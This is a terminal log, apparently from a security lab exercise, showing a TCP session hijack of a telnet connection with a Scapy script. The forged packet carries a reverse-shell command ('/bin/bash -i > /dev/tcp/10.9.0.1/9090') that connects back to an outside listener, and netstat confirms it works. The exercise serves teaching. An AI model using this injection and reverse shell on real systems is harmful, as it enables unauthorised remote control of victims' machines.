root@b3925ccdb7e1:/# telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
58a9ed39547c login: seed
Password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.11.0-1029-gcp x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Feb 17 06:08:13 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/2

[02/17/22]admin@Attacker-vm:~/.../Task 5$ sudo ./hijack.py
version    : BitField  (4 bits)                  = 4               ('4')
ihl        : BitField  (4 bits)                  = None            ('None')
tos        : XByteField                          = 0               ('0')
len        : ShortField                          = None            ('None')
id         : ShortField                          = 1               ('1')
flags      : FlagsField                          = <Flag 0 ()>     ('<Flag 0 ()>')
frag       : BitField  (13 bits)                 = 0               ('0')
ttl        : ByteField                           = 64              ('64')
proto      : ByteEnumField                       = 6               ('0')
chksum     : XShortField                         = None            ('None')
src        : SourceIPField                       = '10.9.0.6'      ('None')
dst        : DestIPField                         = '10.9.0.5'      ('None')
options    : PacketListField                     = []              ('[]')
--
sport      : ShortEnumField                      = 47078           ('20')
dport      : ShortEnumField                      = 23              ('80')
seq        : IntField                            = 1786695429      ('0')
ack        : IntField                            = 468366257       ('0')
dataofs    : BitField  (4 bits)                  = None            ('None')
reserved   : BitField  (3 bits)                  = 0               ('0')
flags      : FlagsField                          = <Flag 16 (A)>   ('<Flag 2 (S)>')
window     : ShortField                          = 8192            ('8192')
chksum     : XShortField                         = None            ('None')
urgptr     : ShortField                          = 0               ('0')
options    : TCPOptionsField                     = []              ("b''")
--
load       : StrField                            = b'\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 \r' ("b''")

root@58a9ed39547c:/# netstat -tna
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.11:32951        0.0.0.0:*               LISTEN     
tcp        0      0 10.9.0.5:50386          10.9.0.1:9090           ESTABLISHED
tcp        0     74 10.9.0.5:23             10.9.0.6:47078          ESTABLISHED

seed@58a9ed39547c:~$ Connection closed by foreign host.
